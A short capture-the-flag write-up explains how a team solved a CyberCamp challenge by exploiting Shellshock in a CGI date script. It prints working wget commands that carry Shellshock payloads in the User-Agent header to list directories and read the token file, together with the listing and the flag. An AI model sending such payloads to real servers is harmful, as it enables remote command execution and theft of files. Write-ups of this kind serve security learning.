On the index page, we got a form asking us the hour in seconds, and an html frame pointing to a cgi script, which shows us the hour in letters.
Our first idea was to make a script which will synchronize with the hour printed by the CGI, in order to have the exact hour at the good time, but this leads to just nothing.
Our second idea were really better. We looked for a vulnerability, isn’t it? And we have a CGI script, isn’t it? What if this challenge was an exploitation of our pretty shellshock?
A little test with wget gave our smile back! The subtlety here was to not forget to put the WHOLE path to the ls binary, otherwise, the flaw did not work đŸ˜‰
wget -U '() { :; }; echo; /bin/ls' -qO- http://challenge.cybercamp.es:8093/cgi-bin/date.cgi
This command returned us the whole listing of the current folder, the one who was containing the date.cgi script. Nothing interesting here.
So the next part was to find the good folder, the one with the flag file :).
As we saw earlier, thanks to HTTP headers, that the server was running apche, we tried to list the default directory for web files: /var/www/html.
$ wget -U '() { :; }; echo; /bin/ls -la /var/www/html' -qO- http://challenge.cybercamp.es:8093/cgi-bin/date.cgi total 28 drwxr-xr-x 5 root root 4096 Jun 17 00:35 . drwxr-xr-x 3 root root 4096 Jun 9 19:22 .. drwxr-xr-x 2 root root 4096 Jul 22 11:51 css -rw-r--r-- 1 root root 34 Jun 9 23:04 datet0ken drwxr-xr-x 2 root root 4096 Jul 22 11:51 fonts -rw-r--r-- 1 root root 1779 Jun 17 00:35 index.html drwxr-xr-x 2 root root 4096 Jul 22 11:51 js
Great!! We now just need to get the token.
$ wget -U '() { :; }; echo; /bin/cat /var/www/html/datet0ken' -qO- http://challenge.cybercamp.es:8093/cgi-bin/date.cgi 7e88cc4325ac0a342ab1bb30f2706ba4